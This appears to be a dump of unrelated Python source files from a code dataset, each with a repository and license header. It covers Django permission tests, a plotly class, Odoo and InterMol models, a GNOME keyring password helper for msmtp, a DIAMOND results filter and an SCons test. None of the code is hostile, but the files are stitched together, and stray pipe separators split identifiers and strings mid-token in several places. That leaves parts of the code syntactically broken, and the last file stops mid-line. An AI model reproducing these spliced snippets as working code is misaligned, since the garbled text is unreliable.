max_retries=self.node_type_operation['max_retries'],
retry_interval=self.node_type_operation['retry_interval'],
)
if self.node_template_operation == NO_OP:
# no-op overrides
return NO_OP
if self.node_type_operation == NO_OP:
# no-op overridden
return self.node_template_operation
merged_operation_implementation = self._derive_implementation()
merged_operation_inputs = self._derive_inputs(
merged_operation_implementation)
merged_operation_executor = self._derive_executor(
merged_operation_implementation)
merged_operation_retries = self._derive_max_retries(
merged_operation_implementation)
merged_operation_retry_interval = self._derive_retry_interval(
merged_operation_implementation)
return operation_mapping(
implementation=merged_operation_implementation,
inputs=merged_operation_inputs,
executor=merged_operation_executor,
max_retries=merged_operation_retries,
retry_interval=merged_operation_retry_interval
)
class NodeTypeNodeTypeOperationMerger(OperationMerger):
def __init__(self,
overriding_operation,
overridden_operation):
self.overridden_node_type_operation = self._create_operation(
overridden_operation)
self.overriding_node_type_operation = self._create_operation(
overriding_operation)
def merge(self):
if self.overriding_node_type_operation is None:
return self.overridden_node_type_operation
if self.overriding_n | ode_type_operation == NO_OP:
return NO_OP
merged_operation_implementation = \
self.overriding_node_type_operation['implementation']
merged_operation_inputs = \
self.overriding_node_type_operation['inputs']
merged_operation_exe | cutor = \
self.overriding_node_type_operation['executor']
merged_operation_max_retries = \
self.overriding_node_type_operation['max_retries']
merged_operation_retry_interval = \
self.overriding_node_type_operation['retry_interval']
return operation_mapping(
implementation=merg |
cnobile2012/inventory | inventory/categories/api/tests/test_categories_api.py | Python | mit | 33,305 | 0.000961 | # -*- coding: utf-8 -*-
#
# inventory/categories/api/tests/test_categories_api.py
#
from django.contrib.auth import get_user_model
from rest_framework.reverse import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from inventory.categories.models import Category
from inventory.common.api.tests.base_test import BaseTest
from inventory.projects.models import Membership
UserModel = get_user_model()
class TestCategoryAPI(BaseTest, APITestCase):
DEFAULT_USER = UserModel.ROLE_MAP[UserModel.DEFAULT_USER]
PROJECT_USER = Membership.ROLE_MAP[Membership.PROJECT_USER]
def __init__(self, name):
super().__init__(name)
def setUp(self):
super().setUp()
# Create an InventoryType and Project.
self.in_type = self._create_inventory_type()
members = [
{'user': self.user, 'role_text': self.PROJECT_USER}
]
self.project = self._create_project(self.in_type, members=members)
kwargs = {'public_id': self.project.public_id}
self.project_uri = reverse('project-detail', kwargs=kwargs)
def get_category_field(self, uri, field):
"""
Get a category and return the value of the provided field.
"""
response = self.client.get(uri, format='json')
return response.data.get(field)
def test_GET_category_list_with_invalid_permissions(self):
"""
Test the category_list endpoint with no permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_category_list_with_valid_permissions(self):
"""
Test the category_list endpoint with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'get'
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-list')
self._test_users_with_valid_permissions(
uri, method, default_user=False)
self._test_project_users_with_valid_permissions(uri, method)
def test_POST_category_list_with_invalid_permissions(self):
"""
Test that a POST to category_list fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('category-list')
data = {}
su = data.setdefault('SU', {})
su['name'] = 'TestCategory-01'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_POST_category_list_with_valid_permissions(self):
"""
Test that a POST to category_list passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'post'
uri = reverse('category-list')
data = {}
su = data.setdefault('SU', {})
su['name'] = 'TestCategory-01'
su['project'] = self.project_uri
ad = data.setdefault('AD', su.copy())
ad['name'] = 'TestCategory-02'
du = data.setdefault('DU', su.copy())
du['name'] = 'TestCategory-03'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['name'] = 'TestCategory-04'
pma = data.setdefault('PMA', su.copy())
pma | ['name'] = 'TestCategory-05'
pdu = data.setdefault('PDU', su.copy())
pdu['name'] = 'TestCategory-06'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, request_data=data)
def test_OPTIONS_category_list_with_invalid_permissions(self):
"""
Test that the method OPTIONS fails with invald permissions.
"""
#self.skipTest("Temporarily skipped")
method = 'option | s'
uri = reverse('category-list')
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_OPTIONS_category_list_with_valid_permissions(self):
"""
Test that the method OPTIONS brings back the correct data.
"""
method = 'options'
uri = reverse('category-list')
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_GET_category_detail_with_invalid_permissions(self):
"""
Test that a GET on the category_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-detail',
kwargs={'public_id': category.public_id})
method = 'get'
self._test_users_with_invalid_permissions(uri, method)
self._test_project_users_with_invalid_permissions(uri, method)
def test_GET_category_detail_with_valid_permissions(self):
"""
Test that a GET to category_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-detail',
kwargs={'public_id': category.public_id})
method = 'get'
self._test_users_with_valid_permissions(uri, method)
self._test_project_users_with_valid_permissions(uri, method)
def test_PUT_category_detail_with_invalid_permissions(self):
"""
Test that a PUT to category_detail fails with invalid permissions.
"""
#self.skipTest("Temporarily skipped")
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-detail',
kwargs={'public_id': category.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['name'] = 'TestCategory-01'
su['project'] = self.project_uri
data.setdefault('AD', su.copy())
data.setdefault('DU', su.copy())
self._test_users_with_invalid_permissions(
uri, method, request_data=data)
data.setdefault('POW', su.copy())
data.setdefault('PMA', su.copy())
data.setdefault('PDU', su.copy())
self._test_project_users_with_invalid_permissions(
uri, method, request_data=data)
def test_PUT_category_detail_with_valid_permissions(self):
"""
Test that a PUT to category_detail passes with valid permissions.
"""
#self.skipTest("Temporarily skipped")
category = self._create_category(self.project, "Test Root Category")
uri = reverse('category-detail',
kwargs={'public_id': category.public_id})
method = 'put'
data = {}
su = data.setdefault('SU', {})
su['name'] = 'TestCategory-01'
su['project'] = self.project_uri
ad = data.setdefault('AD', su.copy())
ad['name'] = 'TestCategory-02'
du = data.setdefault('DU', su.copy())
du['name'] = 'TestCategory-03'
self._test_users_with_valid_permissions(
uri, method, request_data=data)
pow = data.setdefault('POW', su.copy())
pow['name'] = 'TestCategory-04'
pma = data.setdefault('PMA', su.copy())
pma['name'] = 'TestCategory-05'
pdu = data.setdefault('PDU', su.copy())
pdu['name'] = 'TestCategory-06'
self._test_project_users_with_valid_permissions(
uri, method, project_user=False, |
plotly/plotly.py | packages/python/plotly/plotly/graph_objs/scattersmith/marker/colorbar/_title.py | Python | mit | 7,130 | 0.001543 | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scattersmith.marker.colorbar"
_path_str = "scattersmith.marker.colorbar.title"
_valid_props = {"font", "side", "text"}
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.scattersmith.marker.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.scattersmith.marker.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Defaults to "top" when `orientation` if "v" and
defaults to "right" when `orientation` if "h". Note that the
title's location used to be set by the now deprecated
`titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
| @property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A | number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Defaults to "top" when
`orientation` if "v" and defaults to "right" when
`orientation` if "h". Note that the title's location
used to be set by the now deprecated `titleside`
attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.scattersmith.m
arker.colorbar.Title`
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Defaults to "top" when
`orientation` if "v" and defaults to "right" when
`orientation` if "h". Note that the title's location
used to be set by the now deprecated `titleside`
attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scattersmith.marker.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scattersmith.marker.colorbar.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("side", None)
_v = side if side is not None else _v
if _v is not None:
self["side"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
RamonGuiuGou/l10n-spain | l10n_es_aeat/models/l10n_es_aeat_map_tax_line.py | Python | agpl-3.0 | 1,386 | 0 | # -*- coding: utf-8 -*-
# Copyright 2013-2016 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl
from openerp import fields, models
class L10nEsAeatMapTaxLine(models.Model):
_name = 'l10n.es.aeat.map.tax.line'
_order = "field_number asc, id asc"
field_number = fields.Integer(string="Field number", required=True)
tax_ids = fields.Many2many(
comodel_name='account.tax.template', string="Taxes templates",
required=True)
name = fields.Char(string="Name", required=True)
map_parent_id = fields.Many2one(
comodel_name='l10n.es.aeat.map.tax', required=True)
move_type = fields.Selection(
selection=[
('all', 'All'),
('regular', 'Regular'),
('refund', 'Refund'),
], string="Operation type", default='all')
field_type = fields.Selection(
selection=[
| ('base', 'Base'),
('amount', 'Amount'),
], string="Field type", default='amount')
sum_type = fields.Selection(
selection=[
('credit', 'Credit'),
| ('debit', 'Debit'),
('both', 'Both (Credit - Debit)'),
], string="Summarize type", default='both')
inverse = fields.Boolean(string="Inverse summarize sign", default=False)
to_regularize = fields.Boolean(string="To regularize")
|
schaabs/sandbox | net/sandbox.keyvault/python/repl/secrets.py | Python | mit | 160 | 0 | from key_vault_agent | import KeyVaultAgent
class SecretsAgent(KeyVaultAgent):
def get_secret(self):
self.data_client.restore_ | secret()
pass
|
proyectosdeley/proyectos_de_ley | proyectos_de_ley/pdl/migrations/0002_proyecto_legislatura.py | Python | mit | 492 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-09-02 20: | 49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pdl', '0001_initial' | ),
]
operations = [
migrations.AddField(
model_name='proyecto',
name='legislatura',
field=models.IntegerField(default=2011, max_length=4),
preserve_default=False,
),
]
|
ctk3b/InterMol | intermol/forces/cubic_bond_type.py | Python | mit | 1,664 | 0.006611 | import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_bond_type import AbstractBondType
class CubicBondType(AbstractBondType):
__slots__ = ['length', 'C2', 'C3', 'order', 'c']
@accepts_compatible_units(None, None,
length=units.nanometers,
C2=units.kilojoules_per_mole * units.nanometers ** (-2),
C3=units.kilojoules_per_mole * units.nanometers ** (-3),
order=None,
c=None)
def __init__(self, bondingtype1, bondingtype2,
length=0.0 * units.nanometers,
C2=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
C3=0.0 * units.kilojoules_per_mole * units.nanometers ** (-3),
order=1, c=False):
AbstractBondType.__init__(self, bondingtype1, bondingtype2, order, c)
self.length = length
self.C2 = C2
self.C3 = C3
class CubicBond(CubicBondType):
| """
stub documentation
"""
def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
length=0.0 * units.nanometers,
C2=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
C3=0.0 * units.kilojoules_per_mole * units.nanometers ** (-3),
order=1, c=False):
self.atom1 = atom1
self.atom2 = atom2
CubicBondType.__init__(self, bondingtype1, bondingtype2,
| length=length,
C2=C2,
C3=C3,
order=order, c=c) |
tpn/msmtp | scripts/msmtp-gnome-tool/msmtp-gnome-tool.py | Python | gpl-3.0 | 6,270 | 0.005423 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Set/get passwords for MSMTP or MPOP in Gnome Keyring
Copyright (C) 2009 Gaizka Villate
2010 Emmanuel Bouthenot
Original author: Gaizka Villate <gaizkav@gmail.com>
Other author(s): Emmanuel Bouthenot <kolter@openics.org>
URL: http://github.com/gaizka/misc-scripts/tree/master/msmtp
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your
option) any later version. See http://www.gnu.org/copyleft/gpl.html for
the full text of the license.
"""
import sys, os.path, optparse, getpass
try:
import gnomekeyring as gk
except ImportError:
print """Unable to import gnome keyring module
On Debian like systems you probably need to install the following package(s):
python-gnomekeyring"""
sys.exit(-1)
class keyringManager():
def __init__(self):
if os.path.basename(sys.argv[0]).find('msmtp') >= 0:
self.app = 'msmtp'
self.protocol = 'smtp'
elif os.path.basename(sys.argv[0]).find('mpop') >= 0:
self.app = 'mpop'
self.protocol = 'pop3'
else:
print "ERR: program must contain 'msmtp' or 'mpop' in its name"
sys.exit(-1)
# get default keyring name
try:
self.keyring = gk.get_default_keyring_sync()
except gk.NoKeyringDaemonError:
print "ERR: can't open gnome keyring"
print "Are you running this program under a GNOME session ?"
sys.exit(-1)
def get_app(self):
return self.app
def get_protocol(self):
return self.protocol
def set(self, user, password, server):
# display name for password.
display_name = '%s password for %s at %s' % (self.get_app().upper(), user, server)
# select type. if you want some kind of "network" password, it seems that
# appropriate type is network_password because it has a schema already.
type = gk.ITEM_NETWORK_PASSWORD
usr_attrs = {'user':user, 'server':server, 'protocol':self.get_protocol()}
# Now it gets ready to add into the keyring. Do it.
# Its id will be returned if success or an exception will be raised
id = gk.item_create_sync(self.keyring, type, display_name, usr_attrs, password, False)
return id is not None
def get(self, user, server):
protocol = self.get_protocol()
try:
results = gk.find_network_password_sync(user=user, server=server, protocol=protocol)
except gk.NoMatchError:
return None
return results[0]["password"]
def getpass(self, username, server):
ret = True
passwd = self.get(username, server)
if passwd is None:
print "No password set for user '%s' in server '%s'" % (username, server)
ret = False
else:
print "Password for user '%s' in server '%s': '%s'" % (username, server, passwd)
return ret
def setpass(self, username, server):
ret = True
# Does it already exist?
if self.get(username, server) is not None:
print "ERR: %s password for user '%s' in server '%s' already exists, try do delete it first" \
% (self.get_app().upper(), username, server)
ret = False
else:
msg = "Password for user '%s' in server '%s' ? " %(username, server)
passwd = getpass.getpass(msg)
passwd_confirmation = getpass.getpass("Confirmation ? ")
if passwd != passwd_confirmation:
print "ERR: password and password confirmation mismatch"
ret = False
else:
if self.set(username, passwd, server):
print "Password successfully set"
else:
print "ERR: Password failed to set"
ret = False
return ret
def delpass(self, username, server):
ret = True
# Does it already exist?
protocol = self.get_protocol()
try:
results = gk.find_network_password_sync(user=username, server=server, protocol=protocol)
except gk.NoMatchError:
print "No password set for user '%s' | in server '%s'" % (username, server)
ret = False
if ret:
| gk.item_delete_sync(self.keyring, results[0]['item_id'])
print "Password successfully removed"
return ret
def main():
ret = True
km = keyringManager()
parser = optparse.OptionParser(usage="%prog [-s|-g|-d] --username myuser --server myserver")
parser.add_option("-s", "--set-password", action="store_true", \
dest="setpass", help="Set password for %s account" % (km.get_app()))
parser.add_option("-g", "--get-password", action="store_true", \
dest="getpass", help="Get password for %s account" % (km.get_app()))
parser.add_option("-d", "--del-password", action="store_true", \
dest="delpass", help="Delete password for %s account" % (km.get_app()))
parser.add_option("-u", "--username", action="store", dest="username", \
help="Username for %s account" % (km.get_app()))
parser.add_option("-e", "--server", action="store", dest="server", \
help="SMTP server for %s account" % (km.get_app()))
(opts, args) = parser.parse_args()
if not opts.setpass and not opts.getpass and not opts.delpass:
parser.print_help()
print "ERR: You have to use -s or -g or -d"
ret = False
elif not opts.username or not opts.server:
parser.print_help()
print "ERR: You have to use both --username and --server"
ret = False
elif opts.getpass:
ret = km.getpass(opts.username, opts.server)
elif opts.setpass:
ret = km.setpass(opts.username, opts.server)
elif opts.delpass:
ret = km.delpass(opts.username, opts.server)
else:
print "ERR: Unknown option(s)"
ret = False
return ret
if __name__ == '__main__':
if main():
sys.exit(0)
else:
sys.exit(-1)
|
transcript/samsa_v2 | python_scripts/DIAMOND_results_filter.py | Python | gpl-3.0 | 5,358 | 0.01885 | #!/usr/lib/python2.7
##########################################################################
#
# Copyright (C) 2015-2016 Sam Westreich
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation;
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##########################################################################
#
# DIAMOND_results_filter.py
# Created 1/30/17, this version updated 5/22/17
# Sam Westreich, stwestreich@ucdavis.edu, github.com/transcript
#
# Purpose: This takes a DIAMOND outfile and the RefSeq database and pulls
# out hits to any specific organism, identifying the raw input reads that
# were mapped to that organism.
# Usage:
#
# -I infile specifies the infile (a DIAMOND results file
# in m8 format)
# -SO specific target the organism search term, either genus,
# species, or function.
# -D database file specifies a reference database to search
# against for results
# -O outfile name optional; changes the default outfile name
#
##########################################################################
# imports
import operator, sys, time, gzip, re
# String searching function:
def string_find(usage_term):
for idx, elem in enumerate(sys.argv):
this_elem = elem
next_elem = sys.argv[(idx + 1) % len(sys.argv)]
if elem == usage_term:
return next_elem
# loading starting file
if "-I" in sys.argv:
infile_name = string_find("-I")
else:
sys.exit ("WARNING: infile must be specified using '-I' flag.")
# optional outfile of specific organism results
if "-SO" in sys.argv:
target_org = string_find("-SO")
if '"' in target_org:
for idx, elem in enumerate(sys.argv):
this_elem = elem
next_elem = sys.argv[(idx + 1) % len(sys.argv)]
second_elem = sys.argv[(idx + 2) % len(sys.argv)]
if elem == "-SO":
target_org = ne | xt_elem + " " + second_elem
if "-O" in sys.argv:
target_org_outfile = open(string_find("-O"), "w")
else:
target_org_outfile = open(infile_name[:-4] + "_" + target_org + ".tsv", "w")
else:
sys.exit("Need to specify target organism or function to filter by, using -SO flag.")
# loading database file
if "-D" in sys.argv: |
db = open(string_find("-D"), "r")
else:
sys.exit("WARNING: database must be specified using '-D' flag.")
# Getting the database assembled
db_org_dictionary = {}
db_id_dictionary = {}
db_line_counter = 0
db_error_counter = 0
t0 = time.time()
for line in db:
if line.startswith(">") == True:
db_line_counter += 1
# line counter to show progress
if db_line_counter % 1000000 == 0: # each million
t95 = time.time()
print (str(db_line_counter) + " lines processed so far in " + str(t95-t0) + " seconds.")
if target_org in line:
splitline = line.split(" ")
# ID, the hit returned in DIAMOND results
db_id = str(splitline[0])[1:].split(" ")[0]
# name and functional description
db_entry = line.split("[", 1)
db_entry = db_entry[0].split(" ", 1)
db_entry = db_entry[1][:-1]
# organism name
if line.count("[") != 1:
splitline = line.split("[")
db_org = splitline[line.count("[")].strip()[:-1]
if db_org[0].isdigit():
split_db_org = db_org.split()
try:
db_org = split_db_org[1] + " " + split_db_org[2]
except IndexError:
try:
db_org = split_db_org[1]
except IndexError:
db_org = splitline[line.count("[")-1]
if db_org[0].isdigit():
split_db_org = db_org.split()
db_org = split_db_org[1] + " " + split_db_org[2]
else:
db_org = line.split("[", 1)
db_org = db_org[1].split()
try:
db_org = str(db_org[0]) + " " + str(db_org[1])
except IndexError:
db_org = line.strip().split("[", 1)
db_org = db_org[1][:-1]
db_error_counter += 1
db_org = re.sub('[^a-zA-Z0-9-_*. ]', '', db_org)
# add to dictionaries
db_org_dictionary[db_id] = db_org
db_id_dictionary[db_id] = db_entry
db.close()
print ("Database is read and set up, moving on to the infile...")
infile = open (infile_name, "r")
# setting up databases
RefSeq_hit_count_db = {}
unique_seq_db = {}
line_counter = 0
hit_counter = 0
t1 = time.time()
# reading through the infile
for line in infile:
line_counter += 1
splitline = line.split("\t")
try:
target_org_outfile.write(splitline[0] + "\t" + splitline[1] + "\t" + db_org_dictionary[splitline[1]] + "\t" + db_id_dictionary[splitline[1]] + "\n")
hit_counter += 1
except KeyError:
continue
if line_counter % 1000000 == 0:
t99 = time.time()
print (str(line_counter)[:-6] + "M lines processed so far in " + str(t99-t1) + " seconds.")
# results stats
t100 = time.time()
print ("Run complete!")
print ("Number of sequences found matching target query, " + target_org + ":\t" + str(hit_counter))
print ("Time elapsed: " + str(t100-t0) + " seconds.")
infile.close()
target_org_outfile.close()
|
rchurch4/georgetown-data-science-fall-2015 | data_preparation/data_preparation_trip_advisor.py | Python | mit | 4,646 | 0.007964 | # Ravi Makhija
# data_preparation_trip_advisor.py
# Version 4.2
#
# Description:
# This script takes as input the json files generated
# from scraping TRIP ADVISOR, and initiates the following
# data preparation sequence:
# 1) Converts json to csv, making each row of the
# csv a unique review with restaurant info merged
# in.
# 2) Updates geocode lookup table with any new
# geocodes required.
# 3) Adds extra features to the data set and does
# some data cleaning along the way, outputting
# a final csv.
#
# Run from shell:
# python data_preparation_trip_advisor.py
#
# File Dependencies:
# data/geocode_lookup_table.csv
# data/Washington_DC_District_of_Columbia_basic_list.json
# input_file_paths (specified as variable in script)
#
# Script Dependencies:
# data_preparation_lib/json_to_csv_trip_advisor.py
# data_preparation_lib/update_geocode_lookup_table.py
# data_preparation_lib/clean_and_feature_generation_trip_advisor.py
# data_preparation_lib/change_extension_to_csv
#
# References:
# Problem: Importing functions from other files for use in this script.
# http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python
import os
import sys
sys.path.insert(0, './data_preparation_lib') # from github folder root
from json_to_csv_trip_advisor import json_to_csv_trip_advisor
from update_geocode_lookup_table import update_geocode_lookup_table
from clean_and_feature_generation_trip_advisor import clean_and_feature_generation_trip_advisor
from change_extension_to_csv import change_extension_to_csv
################
# Set Data File Paths (User-defined)
#
# Details:
# input_file_paths should be given as a list of strings.
#
# There is also an optional section to dynamically generate
# file names, if they are structured as 'root_#_ending'.
################
####
# Optional - dynamically generate input file paths
make_input_file_paths = []
start_num = 42 # user-defined
end_num = 50 # user-defined
for i in range(start_num, end_num + 1):
path_root = 'data/Washington_DC_District_of_Columbia_review_list' # user-defined
path_ending = '.json' # user-defined
current_path = path_root + str(i) + path_ending
make_input_file_paths.append(current_path)
####
# Mandatory - Set paths
#input_file_paths = ['data/Washington_DC_District_of_Columbia_review_list40.json']
input_file_paths = make_input_file_paths # use this if dynamically | generating file paths above
################
# We proceed with a user prompt, then the data preparation sequence
###### | ##########
# Warn user about possibly overwriting csvs.
# Uses a loop to ensure valid input.
# Also, prompt the user to enter in the city that corresponds to
# the restaurants in the input data. Since restaurant location is
# not a field in the input data, this has to be set at run time,
# and this also means all the input data should correspond to only
# one restaurant location each time this script is run.
#
# As a further note, at this stage, we only have data on DC and
# Nashville, which is why only these two options are given.
current_user_prompt = "\nThis script will overwrite any csv files with the same name. Therefore, you should make sure that input_file_paths is correct in the script before running. \n\nTo proceed, type either 'DC' or 'Nashville' depending on your input data. Otherwise, type 'q' to abort: "
while True:
user_proceed_response = raw_input(current_user_prompt)
if user_proceed_response.lower() != 'dc' and user_proceed_response.lower() != 'nashville' and user_proceed_response.lower() != 'q':
current_user_prompt = '\nPlease enter one of "DC", "Nashville", or "q": '
elif user_proceed_response.lower() == 'q':
print 'Aborting data preparation sequence.'
break
elif user_proceed_response.lower() == 'dc' or user_proceed_response.lower() == 'nashville':
if user_proceed_response.lower() == 'dc':
my_restaurant_location = 'Washington, DC'
elif user_proceed_response.lower() == 'nashville':
my_restaurant_location = 'Nashville, TN'
print '\nStarting data preparation sequence. \n'
# json to csv conversion
json_to_csv_trip_advisor(input_file_paths, my_restaurant_location)
# update geocode lookup table
input_file_paths_csv = change_extension_to_csv(input_file_paths)
update_geocode_lookup_table(input_file_paths_csv)
# add features and do some data cleaning
clean_and_feature_generation_trip_advisor(input_file_paths_csv)
break # exit user prompt loop
|
datalogics/scons | test/ParseDepends.py | Python | mit | 5,431 | 0.002578 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os.path
import string
import TestSCons
_python_ = TestSCons._python_
test = | TestSCons.TestSCons()
test.subdir('subdir', 'sub2')
test.write( | 'build.py', r"""
import sys
contents = open(sys.argv[2], 'rb').read() + open(sys.argv[3], 'rb').read()
file = open(sys.argv[1], 'wb')
file.write(contents)
file.close()
""")
test.write('SConstruct', """
Foo = Builder(action = r'%(_python_)s build.py $TARGET $SOURCES subdir/foo.dep')
Bar = Builder(action = r'%(_python_)s build.py $TARGET $SOURCES subdir/bar.dep')
env = Environment(BUILDERS = { 'Foo' : Foo, 'Bar' : Bar }, SUBDIR='subdir')
env.ParseDepends('foo.d')
env.ParseDepends('bar.d')
env.Foo(target = 'f1.out', source = 'f1.in')
env.Foo(target = 'f2.out', source = 'f2.in')
env.Bar(target = 'subdir/f3.out', source = 'f3.in')
SConscript('subdir/SConscript', "env")
env.Foo(target = 'f5.out', source = 'f5.in')
env.Bar(target = 'sub2/f6.out', source = 'f6.in')
""" % locals())
test.write('foo.d', "f1.out f2.out: %s\n" % os.path.join('subdir', 'foo.dep'))
test.write('bar.d', "%s: %s\nf5.out: sub2" % (os.path.join('subdir', 'f3.out'),
os.path.join('subdir', 'bar.dep')))
test.write(['subdir', 'SConscript'], """
Import("env")
ParseDepends('bar.d')
env.Bar(target = 'f4.out', source = 'f4.in')
""")
test.write(['subdir', 'bar.d'], "f4.out: bar.dep\n")
test.write('f1.in', "f1.in\n")
test.write('f2.in', "f2.in\n")
test.write('f3.in', "f3.in\n")
test.write(['subdir', 'f4.in'], "subdir/f4.in\n")
test.write('f5.in', "f5.in\n")
test.write('f6.in', "f6.in\n")
test.write(['subdir', 'foo.dep'], "subdir/foo.dep 1\n")
test.write(['subdir', 'bar.dep'], "subdir/bar.dep 1\n")
test.run(arguments = '.')
test.must_match('f1.out', "f1.in\nsubdir/foo.dep 1\n")
test.must_match('f2.out', "f2.in\nsubdir/foo.dep 1\n")
test.must_match(['subdir', 'f3.out'], "f3.in\nsubdir/bar.dep 1\n")
